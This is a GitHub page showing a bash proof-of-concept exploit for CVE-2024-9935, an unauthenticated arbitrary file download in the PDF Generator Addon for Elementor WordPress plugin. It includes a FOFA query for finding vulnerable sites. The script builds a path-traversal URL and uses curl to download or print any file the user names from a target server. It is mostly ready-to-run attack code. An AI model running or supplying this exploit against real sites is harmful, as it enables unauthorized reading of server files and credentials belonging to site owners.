-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcve-2024-9935.sh
91 lines (77 loc) · 3.39 KB
/
cve-2024-9935.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
# CVE-2024-9935 POC - PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary File Download
# FOFA body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/" && body="wp-content/themes/"
# Medium https://medium.com/@verylazytech
# Github https://github.com/verylazytech
# My Shop https://buymeacoffee.com/verylazytech/extras
# https://www.verylazytech.com
#!/usr/bin/env bash
banner() {
cat <<'EOF'
______ _______ ____ ___ ____ _ _ ___ ___ _________
/ ___\ \ / / ____| |___ \ / _ \___ \| || | / _ \ / _ \___ / ___|
| | \ \ / /| _| __) | | | |__) | || |_ | (_) | (_) ||_ \___ \
| |___ \ V / | |___ / __/| |_| / __/|__ _| \__, |\__, |__) |__) |
\____| \_/ |_____| |_____|\___/_____| |_| /_/ /_/____/____/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
@VeryLazyTech - Medium
EOF
}
# Call the banner function
banner
set -e
# Function to URL-encode a string
urlencode() {
local string="$1"
local encoded=""
local pos c
for (( pos=0; pos<${#string}; pos++ )); do
c=${string:$pos:1}
case "$c" in
[a-zA-Z0-9.~_-]) encoded+="$c" ;;
*) encoded+=$(printf '%%%02X' "'$c") ;;
esac
done
echo "$encoded"
}
# Check for correct number of arguments
if [ "$#" -ne 3 ]; then
printf "Usage: $0 <target_url> <file_path_to_download> <action: download|view>\n"
exit 1
fi
target_url=$1
file_path=$2
action=$3
# URL-encode the file path
encoded_file_path=$(urlencode "$file_path")
printf "\033[0;32mAttempting to exploit CVE-2024-9935...\033[0m\n"
# Craft the exploit URL with the encoded file path
exploit_url="$target_url/elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f$encoded_file_path"
# Send the request
if [ "$action" == "download" ]; then
response=$(curl -s -o "$(basename "$file_path")" --write-out "%{http_code}" "$exploit_url")
# Check if the file was successfully downloaded
if [ "$response" -eq 200 ]; then
printf "\033[0;32m[+] Exploit successful! File saved as '%s'.\033[0m\n" "$(basename "$file_path")"
else
printf "\033[0;31m[-] Exploit failed. HTTP Response Code: $response\033[0m\n"
fi
elif [ "$action" == "view" ]; then
response=$(curl -s -o "$(basename "$file_path")" --write-out "%{http_code}" "$exploit_url")
# Check if the file was successfully downloaded and is not empty
if [ -s "$(basename "$file_path")" ]; then
printf "\033[0;32m[+] Exploit successful! File content:\033[0m\n"
cat "$(basename "$file_path")"
rm "$(basename "$file_path")"
else
printf "\033[0;31m[-] File not found or empty.\033[0m\n"
rm "$(basename "$file_path")"
fi
else
printf "\033[0;31m[-] Invalid action: '%s'. Use 'download' or 'view'.\033[0m\n" "$action"
exit 1
fi